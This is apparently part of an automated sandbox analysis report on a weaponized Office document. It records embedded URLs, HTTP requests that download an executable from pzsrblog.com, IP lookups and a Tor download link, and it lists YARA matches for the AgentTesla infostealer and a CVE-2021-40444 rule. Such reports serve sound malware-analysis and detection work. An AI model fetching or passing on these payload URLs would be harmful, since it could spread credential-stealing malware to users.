                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://invites.office.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://lifecycle.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://login.windows.local
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://management.azure.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://management.azure.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.action.office.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.engagement.office.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://messaging.office.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ncus.contentsync.
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ncus.pagecontentsync.
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://officeapps.live.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://onedrive.live.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://osi.office.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://otelrules.azureedge.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office365.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office365.com/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://pages.store.office.com/review/query
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://pushchannel.1drv.ms
                Source: ~WRS{1FCF93C7-36B2-4597-9FFA-7A18301AC743}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://settings.outlook.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://staging.cortana.ai
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://tasks.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://wus2.contentsync.
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://wus2.pagecontentsync.
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownDNS traffic detected: queries for: pzsrblog.com
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXrN.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:14:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
                Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: PMoZbw.exe, 00000013.00000002.616474062.0000000001218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b60B8AA9Fu002dD6E9u002d485Du002d90E4u002dF4EB08C8FB98u007d/u00368DDB562u002dB705u002d46E4u002d9F6Fu002d1E7B20C2B6F8.csLarge array initialization: .cctor: array initializer size 10987
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_05B713B8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_05B70C50
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_05B7E33F
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_05B7E350
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766BFC0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_07666573
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766D531
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766ADE0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_07662DF0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766B428
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766CB51
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766E3E8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_07668120
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766BF3D
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_076677A0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766E373
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_07663B48
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766E300
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766E31E
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766F2E0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_0766F2D1
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C353CA
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30CB0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C38460
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C3BD38
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C33F58
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C358F8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30880
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30890
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C34098
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C38179
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30AA9
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30AB8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30CAE
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C34432
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30660
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C35E6A
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C30670
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C317C8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C317E0
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C39F90
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C33F48
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C38712
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C38720
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_015AFA60
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_015A6C60
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_061BC7D8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_061B0040
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_061B0910
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_061B29F8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D39838
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D3B9AD
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D325F8
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D3BD28
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D3D2F0
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll 456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                Source: document.xml.rels, type: SAMPLEMatched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
                Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
